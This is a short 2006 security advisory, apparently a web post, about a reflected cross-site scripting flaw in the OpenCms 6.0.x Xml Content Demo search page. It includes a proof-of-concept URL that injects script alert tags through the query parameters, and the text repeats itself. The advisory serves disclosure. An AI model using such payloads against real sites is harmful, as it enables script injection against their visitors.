2006 Mayo 22

OpenCms 6.0.X Xml Content Demo search engine xss

22 de Mayo de 2006 |

Autor: admin

Version:	Tested on: - 6.0.0 - 6.0.2 - 6.0.3
Discovered by:	Discovered by: jaime.blasco(at)eazel(dot).es http://www.eazel.es
Description:	Input passed to the search query in the Xml Content Demo search engine isn’t properly sanitised. This can be exploited to conduct cross-site scripting attacks. Example: http://host/opencms/opencms /system/modules/org.opencms .frontend.templateone/pages /search.html?action=search &query=%22%3E%3Cscript%3Ealert %28′www.eazel.es’%29%3C %2Fscript%3E%3C!-&index=Online +project+%28VFS%29&page=1&uri= %2Fxmlcontentdemo%2Fside _element_demo.html&__locale=en &query2=%3Cscript%3Ealert%28a %29%3C%2Fscript%3E Keywords: advisory002-OpenCms-Xml-Content-Demo-search-engine-Cross-site-scripting.php

Version:

Tested on:
- 6.0.0
- 6.0.2
- 6.0.3

Discovered by:

Discovered by: jaime.blasco(at)eazel(dot).es
http://www.eazel.es

Description:

Input passed to the search query in the Xml Content Demo search engine isn’t properly sanitised. This can be exploited to conduct cross-site scripting attacks.
Example:

http://host/opencms/opencms /system/modules/org.opencms .frontend.templateone/pages /search.html?action=search &query=%22%3E%3Cscript%3Ealert %28′www.eazel.es’%29%3C %2Fscript%3E%3C!-&index=Online +project+%28VFS%29&page=1&uri= %2Fxmlcontentdemo%2Fside _element_demo.html&__locale=en &query2=%3Cscript%3Ealert%28a %29%3C%2Fscript%3E

Keywords: advisory002-OpenCms-Xml-Content-Demo-search-engine-Cross-site-scripting.php